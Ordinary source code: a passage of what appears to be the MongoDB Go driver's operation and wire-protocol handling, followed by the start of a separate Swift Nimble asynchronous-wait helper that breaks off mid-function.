if retryableErr && preRetryWriteLabelVersion && retryEnabled && !inTransaction {
tt.Labels = append(tt.Labels, RetryableWriteError)
}
if retryable && retryableErr && retries != 0 {
retries--
original, err = err, nil
conn.Close() // Avoid leaking the connection.
srvr, err = op.selectServer(ctx)
if err != nil {
return original
}
conn, err = srvr.Connection(ctx)
if err != nil || conn == nil || !op.retryable(conn.Description()) {
if conn != nil {
conn.Close()
}
return original
}
defer conn.Close() // Avoid leaking the new connection.
if op.Client != nil && op.Client.Committing {
// Apply majority write concern for retries
op.Client.UpdateCommitTransactionWriteConcern()
op.WriteConcern = op.Client.CurrentWc
}
continue
}
if batching && len(tt.WriteErrors) > 0 && currIndex > 0 {
for i := range tt.WriteErrors {
tt.WriteErrors[i].Index += int64(currIndex)
}
}
// If batching is enabled and either ordered is the default (which is true) or
// explicitly set to true and we have write errors, return the errors.
if batching && (op.Batches.Ordered == nil || *op.Batches.Ordered == true) && len(tt.WriteErrors) > 0 {
return tt
}
if op.Client != nil && op.Client.Committing && tt.WriteConcernError != nil {
// When running commitTransaction we return WriteConcernErrors as an Error.
err := Error{
Name: tt.WriteConcernError.Name,
Code: int32(tt.WriteConcernError.Code),
Message: tt.WriteConcernError.Message,
Labels: tt.Labels,
}
// The UnknownTransactionCommitResult label is added to all writeConcernErrors besides unknownReplWriteConcernCode
// and unsatisfiableWriteConcernCode
if err.Code != unknownReplWriteConcernCode && err.Code != unsatisfiableWriteConcernCode {
err.Labels = append(err.Labels, UnknownTransactionCommitResult)
}
if retryableErr && retryEnabled {
err.Labels = append(err.Labels, RetryableWriteError)
}
return err
}
operationErr.WriteConcernError = tt.WriteConcernError
operationErr.WriteErrors = append(operationErr.WriteErrors, tt.WriteErrors...)
operationErr.Labels = tt.Labels
case Error:
if tt.HasErrorLabel(TransientTransactionError) || tt.HasErrorLabel(UnknownTransactionCommitResult) {
op.Client.ClearPinnedServer()
}
if e := err.(Error); retryable && op.Type == Write && e.UnsupportedStorageEngine() {
return ErrUnsupportedStorageEngine
}
connDesc := conn.Description()
var retryableErr bool
if op.Type == Write {
retryableErr = tt.RetryableWrite(connDesc.WireVersion)
preRetryWriteLabelVersion := connDesc.WireVersion != nil && connDesc.WireVersion.Max < 9
inTransaction := !(op.Client.Committing || op.Client.Aborting) && op.Client.TransactionRunning()
// If retryWrites is enabled and the operation isn't in a transaction, add a RetryableWriteError label
// for network errors and retryable errors from pre-4.4 servers
if retryEnabled && !inTransaction &&
(tt.HasErrorLabel(NetworkError) || (retryableErr && preRetryWriteLabelVersion)) {
tt.Labels = append(tt.Labels, RetryableWriteError)
}
} else {
retryableErr = tt.RetryableRead()
}
if retryable && retryableErr && retries != 0 {
retries--
original, err = err, nil
conn.Close() // Avoid leaking the connection.
srvr, err = op.selectServer(ctx)
if err != nil {
return original
}
conn, err = srvr.Connection(ctx)
if err != nil || conn == nil || !op.retryable(conn.Description()) {
if conn != nil {
conn.Close()
}
return original
}
defer conn.Close() // Avoid leaking the new connection.
if op.Client != nil && op.Client.Committing {
// Apply majority write concern for retries
op.Client.UpdateCommitTransactionWriteConcern()
op.WriteConcern = op.Client.CurrentWc
}
continue
}
if op.Client != nil && op.Client.Committing && (retryableErr || tt.Code == 50) {
// If we got a retryable error or MaxTimeMSExpired error, we add UnknownTransactionCommitResult.
tt.Labels = append(tt.Labels, UnknownTransactionCommitResult)
}
return tt
case nil:
if moreToCome {
return ErrUnacknowledgedWrite
}
if perr != nil {
return perr
}
default:
return err
}
if batching && len(op.Batches.Documents) > 0 {
if retryable && op.Client != nil && op.RetryMode != nil {
if *op.RetryMode > RetryNone {
op.Client.IncrementTxnNumber()
}
if *op.RetryMode == RetryOncePerCommand {
retries = 1
}
}
currIndex += len(op.Batches.Current)
op.Batches.ClearBatch()
continue
}
break
}
if len(operationErr.WriteErrors) > 0 || operationErr.WriteConcernError != nil {
return operationErr
}
return nil
}
// Retryable writes are supported if the server supports sessions, the operation is not
// within a transaction, and the write is acknowledged
func (op Operation) retryable(desc description.Server) bool {
switch op.Type {
case Write:
if op.Client != nil && (op.Client.Committing || op.Client.Aborting) {
return true
}
if desc.SupportsRetryWrites() &&
desc.WireVersion != nil && desc.WireVersion.Max >= 6 &&
op.Client != nil && !(op.Client.TransactionInProgress() || op.Client.TransactionStarting()) &&
writeconcern.AckWrite(op.WriteConcern) {
return true
}
case Read:
if op.Client != nil && (op.Client.Committing || op.Client.Aborting) {
return true
}
if desc.WireVersion != nil && desc.WireVersion.Max >= 6 &&
(op.Client == nil || !(op.Client.TransactionInProgress() || op.Client.TransactionStarting())) {
return true
}
}
return false
}
// roundTrip writes a wiremessage to the connection and then reads a wiremessage. The wm parameter
// is reused when reading the wiremessage.
func (op Operation) roundTrip(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
err := conn.WriteWireMessage(ctx, wm)
if err != nil {
labels := []string{NetworkError}
if op.Client != nil {
op.Client.MarkDirty()
}
if op.Client != nil && op.Client.TransactionRunning() && !op.Client.Committing {
labels = append(labels, TransientTransactionError)
}
if op.Client != nil && op.Client.Committing {
labels = append(labels, UnknownTransactionCommitResult)
}
return nil, Error{Message: err.Error(), Labels: labels, Wrapped: err}
}
return op.readWireMessage(ctx, conn, wm)
}
func (op Operation) readWireMessage(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
var err error
wm, err = conn.ReadWireMessage(ctx, wm[:0])
if err != nil {
labels := []string{NetworkError}
if op.Client != nil {
op.Client.MarkDirty()
}
if op.Client != nil && op.Client.TransactionRunning() && !op.Client.Committing {
labels = append(labels, TransientTransactionError)
}
if op.Client != nil && op.Client.Committing {
labels = append(labels, UnknownTransactionCommitResult)
}
return nil, Error{Message: err.Error(), Labels: labels, Wrapped: err}
}
// If we're using a streamable connection, we set its streaming state based on the moreToCome flag in the server
// response.
if streamer, ok := conn.(StreamerConnection); ok {
streamer.SetStreaming(wiremessage.IsMsgMoreToCome(wm))
}
// decompress wiremessage
wm, err = op.decompressWireMessage(wm)
if err != nil {
return nil, err
}
// decode
res, err := op.decodeResult(wm)
// Update cluster/operation time and recovery tokens before handling the error to ensure we're properly updating
// everything.
op.updateClusterTimes(res)
op.updateOperationTime(res)
op.Client.UpdateRecoveryToken(bson.Raw(res))
if err != nil {
return res, err
}
// If there is no error, automatically attempt to decrypt all results if client side encryption is enabled.
if op.Crypt != nil {
return op.Crypt.Decrypt(ctx, res)
}
return res, nil
}
// moreToComeRoundTrip writes a wiremessage to the provided connection. This is used when an OP_MSG is
// being sent with the moreToCome bit set.
func (op *Operation) moreToComeRoundTrip(ctx context.Context, conn Connection, wm []byte) ([]byte, error) {
err := conn.WriteWireMessage(ctx, wm)
if err != nil {
if op.Client != nil {
op.Client.MarkDirty()
}
err = Error{Message: err.Error(), Labels: []string{TransientTransactionError, NetworkError}, Wrapped: err}
}
return bsoncore.BuildDocument(nil, bsoncore.AppendInt32Element(nil, "ok", 1)), err
}
// decompressWireMessage handles decompressing a wiremessage. If the wiremessage
// is not compressed, this method will return the wiremessage.
func (Operation) decompressWireMessage(wm []byte) ([]byte, error) {
// read the header and ensure this is a compressed wire message
length, reqid, respto, opcode, rem, ok := wiremessage.ReadHeader(wm)
if !ok || len(wm) < int(length) {
return nil, errors.New("malformed wire message: insufficient bytes")
}
if opcode != wiremessage.OpCompressed {
return wm, nil
}
// get the original opcode and uncompressed size
opcode, rem, ok = wiremessage.ReadCompressedOriginalOpCode(rem)
if !ok {
return nil, errors.New("malformed OP_COMPRESSED: missing original opcode")
}
uncompressedSize, rem, ok := wiremessage.ReadCompressedUncompressedSize(rem)
if !ok {
return nil, errors.New("malformed OP_COMPRESSED: missing uncompressed size")
}
// get the compressor ID and decompress the message
compressorID, rem, ok := wiremessage.ReadCompressedCompressorID(rem)
if !ok {
return nil, errors.New("malformed OP_COMPRESSED: missing compressor ID")
}
compressedSize := length - 25 // header (16) + original opcode (4) + uncompressed size (4) + compressor ID (1)
// return the original wiremessage
msg, rem, ok := wiremessage.ReadCompressedCompressedMessage(rem, compressedSize)
if !ok {
return nil, errors.New("malformed OP_COMPRESSED: insufficient bytes for compressed wiremessage")
}
header := make([]byte, 0, uncompressedSize+16)
header = wiremessage.AppendHeader(header, uncompressedSize+16, reqid, respto, opcode)
opts := CompressionOpts{
Compressor: compressorID,
UncompressedSize: uncompressedSize,
}
uncompressed, err := DecompressPayload(msg, opts)
if err != nil {
return nil, err
}
return append(header, uncompressed...), nil
}
func (op Operation) createWireMessage(ctx context.Context, dst []byte,
desc description.SelectedServer, conn Connection) ([]byte, startedInformation, error) {
if desc.WireVersion == nil || desc.WireVersion.Max < wiremessage.OpmsgWireVersion {
return op.createQueryWireMessage(dst, desc)
}
return op.createMsgWireMessage(ctx, dst, desc, conn)
}
func (op Operation) addBatchArray(dst []byte) []byte {
aidx, dst := bsoncore.AppendArrayElementStart(dst, op.Batches.Identifier)
for i, doc := range op.Batches.Current {
dst = bsoncore.AppendDocumentElement(dst, strconv.Itoa(i), doc)
}
dst, _ = bsoncore.AppendArrayEnd(dst, aidx)
return dst
}
func (op Operation) createQueryWireMessage(dst []byte, desc description.SelectedServer) ([]byte, startedInformation, error) {
var info startedInformation
flags := op.slaveOK(desc)
var wmindex int32
info.requestID = wiremessage.NextRequestID()
wmindex, dst = wiremessage.AppendHeaderStart(dst, info.requestID, 0, wiremessage.OpQuery)
dst = wiremessage.AppendQueryFlags(dst, flags)
// FullCollectionName
dst = append(dst, op.Database...)
dst = append(dst, dollarCmd[:]...)
dst = append(dst, 0x00)
dst = wiremessage.AppendQueryNumberToSkip(dst, 0)
dst = wiremessage.AppendQueryNumberToReturn(dst, -1)
wrapper := int32(-1)
rp, err := op.createReadPref(desc.Server.Kind, desc.Kind, true)
if err != nil {
return dst, info, err
}
if len(rp) > 0 {
wrapper, dst = bsoncore.AppendDocumentStart(dst)
dst = bsoncore.AppendHeader(dst, bsontype.EmbeddedDocument, "$query")
}
idx, dst := bsoncore.AppendDocumentStart(dst)
dst, err = op.CommandFn(dst, desc)
if err != nil {
return dst, info, err
}
if op.Batches != nil && len(op.Batches.Current) > 0 {
dst = op.addBatchArray(dst)
}
dst, err = op.addReadConcern(dst, desc)
if err != nil {
return dst, info, err
}
dst, err = op.addWriteConcern(dst, desc)
if err != nil {
return dst, info, err
}
dst, err = op.addSession(dst, desc)
if err != nil {
return dst, info, err
}
dst = op.addClusterTime(dst, desc)
dst, _ = bsoncore.AppendDocumentEnd(dst, idx)
// Command monitoring only reports the document inside $query
info.cmd = dst[idx:]
if len(rp) > 0 {
var err error
dst = bsoncore.AppendDocumentElement(dst, "$readPreference", rp)
dst, err = bsoncore.AppendDocumentEnd(dst, wrapper)
if err != nil {
return dst, info, err
}
}
return bsoncore.UpdateLength(dst, wmindex, int32(len(dst[wmindex:]))), info, nil
}
func (op Operation) createMsgWireMessage(ctx context.Context, dst []byte, desc description.SelectedServer,
conn Connection) ([]byte, startedInformation, error) {
var info startedInformation
var flags wiremessage.MsgFlag
var wmindex int32
// We set the MoreToCome bit if we have a write concern, it's unacknowledged, and we either
// aren't batching or we are encoding the last batch.
if op.WriteConcern != nil && !writeconcern.AckWrite(op.WriteConcern) && (op.Batches == nil || len(op.Batches.Documents) == 0) {
flags = wiremessage.MoreToCome
}
// Set the ExhaustAllowed flag if the connection supports streaming. This will tell the server that it can
// respond with the MoreToCome flag and then stream responses over this connection.
if streamer, ok := conn.(StreamerConnection); ok && streamer.SupportsStreaming() {
flags |= wiremessage.ExhaustAllowed
}
info.requestID = wiremessage.NextRequestID()
wmindex, dst = wiremessage.AppendHeaderStart(dst, info.requestID, 0, wiremessage.OpMsg)
dst = wiremessage.AppendMsgFlags(dst, flags)
// Body
dst = wiremessage.AppendMsgSectionType(dst, wiremessage.SingleDocument)
idx, dst := bsoncore.AppendDocumentStart(dst)
dst, err := op.addCommandFields(ctx, dst, desc)
if err != nil {
return dst, info, err
}
dst, err = op.addReadConcern(dst, desc)
if err != nil {
return dst, info, err
}
dst, err = op.addWriteConcern(dst, desc)
if err != nil {
return dst, info, err
}
dst, err = op.addSession(dst, desc)
if err != nil {
return dst, info, err
}
dst = op.addClusterTime(dst, desc)
dst = bsoncore.AppendStringElement(dst, "$db", op.Database)
rp, err := op.createReadPref(desc.Server.Kind, desc.Kind, false)
if err != nil {
return dst, info, err
}
if len(rp) > 0 {
dst = bsoncore.AppendDocumentElement(dst, "$readPreference", rp)
}
dst, _ = bsoncore.AppendDocumentEnd(dst, idx)
// The command document for monitoring shouldn't include the type 1 payload as a document sequence
info.cmd = dst[idx:]
// add batch as a document sequence if auto encryption is not enabled
// if auto encryption is enabled, the batch will already be an array in the command document
if !op.shouldEncrypt() && op.Batches != nil && len(op.Batches.Current) > 0 {
info.documentSequenceIncluded = true
dst = wiremessage.AppendMsgSectionType(dst, wiremessage.DocumentSequence)
idx, dst = bsoncore.ReserveLength(dst)
dst = append(dst, op.Batches.Identifier...)
dst = append(dst, 0x00)
for _, doc := range op.Batches.Current {
dst = append(dst, doc...)
}
dst = bsoncore.UpdateLength(dst, idx, int32(len(dst[idx:])))
}
return bsoncore.UpdateLength(dst, wmindex, int32(len(dst[wmindex:]))), info, nil
}
// addCommandFields adds the fields for a command to the wire message in dst. This assumes that the start of the document
// has already been added and does not add the final 0 byte.
func (op Operation) addCommandFields(ctx context.Context, dst []byte, desc description.SelectedServer) ([]byte, error) {
if !op.shouldEncrypt() {
return op.CommandFn(dst, desc)
}
if desc.WireVersion.Max < cryptMinWireVersion {
return dst, errors.New("auto-encryption requires a MongoDB version of 4.2")
}
// create temporary command document
cidx, cmdDst := bsoncore.AppendDocumentStart(nil)
var err error
cmdDst, err = op.CommandFn(cmdDst, desc)
if err != nil {
return dst, err
}
// use a BSON array instead of a type 1 payload because mongocryptd will convert to arrays regardless
if op.Batches != nil && len(op.Batches.Current) > 0 {
cmdDst = op.addBatchArray(cmdDst)
}
cmdDst, _ = bsoncore.AppendDocumentEnd(cmdDst, cidx)
// encrypt the command
encrypted, err := op.Crypt.Encrypt(ctx, op.Database, cmdDst)
if err != nil {
return dst, err
}
// append encrypted command to original destination, removing the first 4 bytes (length) and final byte (terminator)
dst = append(dst, encrypted[4:len(encrypted)-1]...)
return dst, nil
}
func (op Operation) addReadConcern(dst []byte, desc description.SelectedServer) ([]byte, error) {
if op.MinimumReadConcernWireVersion > 0 && (desc.WireVersion == nil || !desc.WireVersion.Includes(op.MinimumReadConcernWireVersion)) {
return dst, nil
}
rc := op.ReadConcern
client := op.Client
// Starting transaction's read concern overrides all others
if client != nil && client.TransactionStarting() && client.CurrentRc != nil {
rc = client.CurrentRc
}
// start transaction must append afterclustertime IF causally consistent and operation time exists
if rc == nil && client != nil && client.TransactionStarting() && client.Consistent && client.OperationTime != nil {
rc = readconcern.New()
}
if rc == nil {
return dst, nil
}
_, data, err := rc.MarshalBSONValue() // always returns a document
if err != nil {
return dst, err
}
if description.SessionsSupported(desc.WireVersion) && client != nil && client.Consistent && client.OperationTime != nil {
data = data[:len(data)-1] // remove the null byte
data = bsoncore.AppendTimestampElement(data, "afterClusterTime", client.OperationTime.T, client.OperationTime.I)
data, _ = bsoncore.AppendDocumentEnd(data, 0)
}
if len(data) == bsoncore.EmptyDocumentLength {
return dst, nil
}
return bsoncore.AppendDocumentElement(dst, "readConcern", data), nil
}
func (op Operation) addWriteConcern(dst []byte, desc description.SelectedServer) ([]byte, error) {
if op.MinimumWriteConcernWireVersion > 0 && (desc.WireVersion == nil || !desc.WireVersion.Includes(op.MinimumWriteConcernWireVersion)) {
return dst, nil
}
wc := op.WriteConcern
if wc == nil {
return dst, nil
}
t, data, err := wc.MarshalBSONValue()
if err == writeconcern.ErrEmptyWriteConcern {
return dst, nil
}
if err != nil {
return dst, err
}
return append(bsoncore.AppendHeader(dst, t, "writeConcern"), data...), nil
}
func (op Operation) addSession(dst []byte, desc description.SelectedServer) ([]byte, error) {
client := op.Client
if client == nil || !description.SessionsSupported(desc.WireVersion) || desc.SessionTimeoutMinutes == 0 {
return dst, nil
}
if err := client.UpdateUseTime(); err != nil {
return dst, err
}
dst = bsoncore.AppendDocumentElement(dst, "lsid", client.SessionID)
var addedTxnNumber bool
if op.Type == Write && client.RetryWrite {
addedTxnNumber = true
dst = bsoncore.AppendInt64Element(dst, "txnNumber", op.Client.TxnNumber)
}
if client.TransactionRunning() || client.RetryingCommit {
if !addedTxnNumber {
dst = bsoncore.AppendInt64Element(dst, "txnNumber", op.Client.TxnNumber)
}
if client.TransactionStarting() {
dst = bsoncore.AppendBooleanElement(dst, "startTransaction", true)
}
dst = bsoncore.AppendBooleanElement(dst, "autocommit", false)
}
client.ApplyCommand(desc.Server)
return dst, nil
}
func (op Operation) addClusterTime(dst []byte, desc description.SelectedServer) []byte {
client, clock := op.Client, op.Clock
if (clock == nil && client == nil) || !description.SessionsSupported(desc.WireVersion) {
return dst
}
clusterTime := clock.GetClusterTime()
if client != nil {
clusterTime = session.MaxClusterTime(clusterTime, client.ClusterTime)
}
if clusterTime == nil {
return dst
}
val, err := clusterTime.LookupErr("$clusterTime")
if err != nil {
return dst
}
return append(bsoncore.AppendHeader(dst, val.Type, "$clusterTime"), val.Value...)
// return bsoncore.AppendDocumentElement(dst, "$clusterTime", clusterTime)
}
// updateClusterTimes updates the cluster times for the session and cluster clock attached to this
// operation. While the session's AdvanceClusterTime may return an error, this method does not
// because an error being returned from this method will not be returned further up.
func (op Operation) updateClusterTimes(response bsoncore.Document) {
// Extract cluster time.
value, err := response.LookupErr("$clusterTime")
if err != nil {
// $clusterTime not included by the server
return
}
clusterTime := bsoncore.BuildDocumentFromElements(nil, bsoncore.AppendValueElement(nil, "$clusterTime", value))
sess, clock := op.Client, op.Clock
if sess != nil {
_ = sess.AdvanceClusterTime(bson.Raw(clusterTime))
}
if clock != nil {
clock.AdvanceClusterTime(bson.Raw(clusterTime))
}
}
// updateOperationTime updates the operation time on the session attached to this operation. While
// the session's AdvanceOperationTime method may return an error, this method does not because an
// error being returned from this method will not be returned further up.
func (op Operation) updateOperationTime(response bsoncore.Document) {
sess := op.Client
if sess == nil {
return
}
opTimeElem, err := response.LookupErr("operationTime")
if err != nil {
// operationTime not included by the server
return
}
t, i := opTimeElem.Timestamp()
_ = sess.AdvanceOperationTime(&primitive.Timestamp{
T: t,
I: i,
})
}
func (op Operation) getReadPrefBasedOnTransaction() (*readpref.ReadPref, error) {
if op.Client != nil && op.Client.TransactionRunning() {
// Transaction's read preference always takes priority
rp := op.Client.CurrentRp
// Reads in a transaction must have read preference primary
// This must not be checked in startTransaction
if rp != nil && !op.Client.TransactionStarting() && rp.Mode() != readpref.PrimaryMode {
return nil, ErrNonPrimaryReadPref
}
return rp, nil
}
return op.ReadPreference, nil
}
func (op Operation) createReadPref(serverKind description.ServerKind, topologyKind description.TopologyKind, isOpQuery bool) (bsoncore.Document, error) {
if serverKind == description.Standalone || (isOpQuery && serverKind != description.Mongos) || op.Type == Write {
// Don't send read preference for non-mongos when using OP_QUERY or for all standalones
return nil, nil
}
idx, doc := bsoncore.AppendDocumentStart(nil)
rp, err := op.getReadPrefBasedOnTransaction()
if err != nil {
return nil, err
}
if rp == nil {
if topologyKind == description.Single && serverKind != description.Mongos {
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
return nil, nil
}
switch rp.Mode() {
case readpref.PrimaryMode:
if serverKind == description.Mongos {
return nil, nil
}
if topologyKind == description.Single {
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
doc = bsoncore.AppendStringElement(doc, "mode", "primary")
case readpref.PrimaryPreferredMode:
doc = bsoncore.AppendStringElement(doc, "mode", "primaryPreferred")
case readpref.SecondaryPreferredMode:
_, ok := rp.MaxStaleness()
if serverKind == description.Mongos && isOpQuery && !ok && len(rp.TagSets()) == 0 && rp.HedgeEnabled() == nil {
return nil, nil
}
doc = bsoncore.AppendStringElement(doc, "mode", "secondaryPreferred")
case readpref.SecondaryMode:
doc = bsoncore.AppendStringElement(doc, "mode", "secondary")
case readpref.NearestMode:
doc = bsoncore.AppendStringElement(doc, "mode", "nearest")
}
sets := make([]bsoncore.Document, 0, len(rp.TagSets()))
for _, ts := range rp.TagSets() {
if len(ts) == 0 {
continue
}
i, set := bsoncore.AppendDocumentStart(nil)
for _, t := range ts {
set = bsoncore.AppendStringElement(set, t.Name, t.Value)
}
set, _ = bsoncore.AppendDocumentEnd(set, i)
sets = append(sets, set)
}
if len(sets) > 0 {
var aidx int32
aidx, doc = bsoncore.AppendArrayElementStart(doc, "tags")
for i, set := range sets {
doc = bsoncore.AppendDocumentElement(doc, strconv.Itoa(i), set)
}
doc, _ = bsoncore.AppendArrayEnd(doc, aidx)
}
if d, ok := rp.MaxStaleness(); ok {
doc = bsoncore.AppendInt32Element(doc, "maxStalenessSeconds", int32(d.Seconds()))
}
if hedgeEnabled := rp.HedgeEnabled(); hedgeEnabled != nil {
var hedgeIdx int32
hedgeIdx, doc = bsoncore.AppendDocumentElementStart(doc, "hedge")
doc = bsoncore.AppendBooleanElement(doc, "enabled", *hedgeEnabled)
doc, err = bsoncore.AppendDocumentEnd(doc, hedgeIdx)
if err != nil {
return nil, fmt.Errorf("error creating hedge document: %v", err)
}
}
doc, _ = bsoncore.AppendDocumentEnd(doc, idx)
return doc, nil
}
func (op Operation) slaveOK(desc description.SelectedServer) wiremessage.QueryFlag {
if desc.Kind == description.Single && desc.Server.Kind != description.Mongos {
return wiremessage.SlaveOK
}
if rp := op.ReadPreference; rp != nil && rp.Mode() != readpref.PrimaryMode {
return wiremessage.SlaveOK
}
return 0
}
func (Operation) canCompress(cmd string) bool {
if cmd == "isMaster" || cmd == "saslStart" || cmd == "saslContinue" || cmd == "getnonce" || cmd == "authenticate" ||
cmd == "createUser" || cmd == "updateUser" || cmd == "copydbSaslStart" || cmd == "copydbgetnonce" || cmd == "copydb" {
return false
}
return true
}
// decodeOpReply extracts the necessary information from an OP_REPLY wire message.
// includesHeader: specifies whether or not wm includes the message header
// Returns the decoded OP_REPLY. If the err field of the returned opReply is non-nil, an error occurred while decoding
// or validating the response and the other fields are undefined.
func (Operation) decodeOpReply(wm []byte, includesHeader bool) opReply {
var reply opReply
var ok bool
if includesHeader {
wmLength := len(wm)
var length int32
var opcode wiremessage.OpCode
length, _, _, opcode, wm, ok = wiremessage.ReadHeader(wm)
if !ok || int(length) > wmLength {
reply.err = errors.New("malformed wire message: insufficient bytes")
return reply
}
if opcode != wiremessage.OpReply {
reply.err = errors.New("malformed wire message: incorrect opcode")
return reply
}
}
reply.responseFlags, wm, ok = wiremessage.ReadReplyFlags(wm)
if !ok {
reply.err = errors.New("malformed OP_REPLY: missing flags")
return reply
}
reply.cursorID, wm, ok = wiremessage.ReadReplyCursorID(wm)
if !ok {
reply.err = errors.New("malformed OP_REPLY: missing cursorID")
return reply
}
reply.startingFrom, wm, ok = wiremessage.ReadReplyStartingFrom(wm)
if !ok {
reply.err = errors.New("malformed OP_REPLY: missing startingFrom")
return reply
}
reply.numReturned, wm, ok = wiremessage.ReadReplyNumberReturned(wm)
if !ok {
reply.err = errors.New("malformed OP_REPLY: missing numberReturned")
return reply
}
reply.documents, wm, ok = wiremessage.ReadReplyDocuments(wm)
if !ok {
reply.err = errors.New("malformed OP_REPLY: could not read documents from reply")
}
if reply.responseFlags&wiremessage.QueryFailure == wiremessage.QueryFailure {
reply.err = QueryFailureError{
Message: "command failure",
Response: reply.documents[0],
}
return reply
}
if reply.responseFlags&wiremessage.CursorNotFound == wiremessage.CursorNotFound {
reply.err = ErrCursorNotFound
return reply
}
if reply.numReturned != int32(len(reply.documents)) {
reply.err = ErrReplyDocumentMismatch
return reply
}
return reply
}
func (op Operation) decodeResult(wm []byte) (bsoncore.Document, error) {
wmLength := len(wm)
length, _, _, opcode, wm, ok := wiremessage.ReadHeader(wm)
if !ok || int(length) > wmLength {
return nil, errors.New("malformed wire message: insufficient bytes")
}
wm = wm[:wmLength-16] // constrain to just this wiremessage, incase there are multiple in the slice
switch opcode {
case wiremessage.OpReply:
reply := op.decodeOpReply(wm, false)
if reply.err != nil {
return nil, reply.err
}
if reply.numReturned == 0 {
return nil, ErrNoDocCommandResponse
}
if reply.numReturned > 1 {
return nil, ErrMultiDocCommandResponse
}
rdr := reply.documents[0]
if err := rdr.Validate(); err != nil {
return nil, NewCommandResponseError("malformed OP_REPLY: invalid document", err)
}
return rdr, extractError(rdr)
case wiremessage.OpMsg:
_, wm, ok = wiremessage.ReadMsgFlags(wm)
if !ok {
return nil, errors.New("malformed wire message: missing OP_MSG flags")
}
var res bsoncore.Document
for len(wm) > 0 {
var stype wiremessage.SectionType
stype, wm, ok = wiremessage.ReadMsgSectionType(wm)
if !ok {
return nil, errors.New("malformed wire message: insuffienct bytes to read section type")
}
switch stype {
case wiremessage.SingleDocument:
res, wm, ok = wiremessage.ReadMsgSectionSingleDocument(wm)
if !ok {
return nil, errors.New("malformed wire message: insufficient bytes to read single document")
}
case wiremessage.DocumentSequence:
// TODO(GODRIVER-617): Implement document sequence returns.
_, _, wm, ok = wiremessage.ReadMsgSectionDocumentSequence(wm)
if !ok {
return nil, errors.New("malformed wire message: insufficient bytes to read document sequence")
}
default:
return nil, fmt.Errorf("malformed wire message: uknown section type %v", stype)
}
}
err := res.Validate()
if err != nil {
return nil, NewCommandResponseError("malformed OP_MSG: invalid document", err)
}
return res, extractError(res)
default:
return nil, fmt.Errorf("cannot decode result from %s", opcode)
}
}
// getCommandName returns the name of the command from the given BSON document.
func (op Operation) getCommandName(doc []byte) string {
// skip 4 bytes for document length and 1 byte for element type
idx := bytes.IndexByte(doc[5:], 0x00) // look for the 0 byte after the command name
return string(doc[5 : idx+5])
}
func (op *Operation) redactCommand(cmd string, doc bsoncore.Document) bool {
if cmd == "authenticate" || cmd == "saslStart" || cmd == "saslContinue" || cmd == "getnonce" || cmd == "createUser" ||
cmd == "updateUser" || cmd == "copydbgetnonce" || cmd == "copydbsaslstart" || cmd == "copydb" {
return true
}
if strings.ToLower(cmd) != "ismaster" {
return false
}
// An isMaster without speculative authentication can be monitored.
_, err := doc.LookupErr("speculativeAuthenticate")
return err == nil
}
// publishStartedEvent publishes a CommandStartedEvent to the operation's command monitor if possible. If the command is
// an unacknowledged write, a CommandSucceededEvent will be published as well. If started events are not being monitored,
// no events are published.
func (op Operation) publishStartedEvent(ctx context.Context, info startedInformation) {
if op.CommandMonitor == nil || op.CommandMonitor.Started == nil {
return
}
// Make a copy of the command. Redact if the command is security sensitive and cannot be monitored.
// If there was a type 1 payload for the current batch, convert it to a BSON array.
cmdCopy := bson.Raw{}
if !info.redacted {
cmdCopy = make([]byte, len(info.cmd))
copy(cmdCopy, info.cmd)
if info.documentSequenceIncluded {
cmdCopy = cmdCopy[:len(info.cmd)-1] // remove 0 byte at end
cmdCopy = op.addBatchArray(cmdCopy)
cmdCopy, _ = bsoncore.AppendDocumentEnd(cmdCopy, 0) // add back 0 byte and update length
}
}
started := &event.CommandStartedEvent{
Command: cmdCopy,
DatabaseName: op.Database,
CommandName: info.cmdName,
RequestID: int64(info.requestID),
ConnectionID: info.connID,
}
op.CommandMonitor.Started(ctx, started)
}
// publishFinishedEvent publishes either a CommandSucceededEvent or a CommandFailedEvent to the operation's command
// monitor if possible. If success/failure events aren't being monitored, no events are published.
func (op Operation) publishFinishedEvent(ctx context.Context, info finishedInformation) {
success := info.cmdErr == nil
if _, ok := info.cmdErr.(WriteCommandError); ok {
success = true
}
if op.CommandMonitor == nil || (success && op.CommandMonitor.Succeeded == nil) || (!success && op.CommandMonitor.Failed == nil) {
return
}
var durationNanos int64
var emptyTime time.Time
if info.startTime != emptyTime {
durationNanos = time.Now().Sub(info.startTime).Nanoseconds()
}
finished := event.CommandFinishedEvent{
CommandName: info.cmdName,
RequestID: int64(info.requestID),
ConnectionID: info.connID,
DurationNanos: durationNanos,
}
if success {
res := bson.Raw{}
// Only copy the reply for commands that are not security sensitive
if !info.redacted {
res = make([]byte, len(info.response))
copy(res, info.response)
}
successEvent := &event.CommandSucceededEvent{
Reply: res,
CommandFinishedEvent: finished,
}
op.CommandMonitor.Succeeded(ctx, successEvent)
return
}
failedEvent := &event.CommandFailedEvent{
Failure: info.cmdErr.Error(),
CommandFinishedEvent: finished,
}
op.CommandMonitor.Failed(ctx, failedEvent)
}
| {
"pile_set_name": "Github"
} |
import Foundation
#if _runtime(_ObjC)
private enum ErrorResult {
case exception(NSException)
case error(Error)
case none
}
/// Only classes, protocols, methods, properties, and subscript declarations can be
/// bridges to Objective-C via the @objc keyword. This class encapsulates callback-style
/// asynchronous waiting logic so that it may be called from Objective-C and Swift.
internal class NMBWait: NSObject {
internal class func until(
timeout: TimeInterval,
file: FileString = #file,
line: UInt = #line,
action: @escaping (@escaping () -> Void) -> Void) -> Void {
return throwableUntil(timeout: timeout, file: file, line: line) { done in
action(done)
}
}
// Using a throwable closure makes this method not objc compatible.
internal class func throwableUntil(
timeout: TimeInterval,
file: FileString = #file,
line: UInt = #line,
action: @escaping (@escaping () -> Void) throws -> Void) -> Void {
let awaiter = NimbleEnvironment.activeInstance.awaiter
let leeway = timeout / 2.0
let result = awaiter.performBlock { (done: @escaping (ErrorResult) -> Void) throws -> Void in
DispatchQueue.main.async {
let capture = NMBExceptionCapture(
handler: ({ exception in
done(.exception(exception))
}),
finally: ({ })
)
capture.tryBlock {
do {
try action() {
done(.none)
}
} catch let e {
done(.error(e))
}
}
}
}.timeout(timeout, forcefullyAbortTimeout: leeway).wait("waitUntil(...)", file: file, line: line)
switch result {
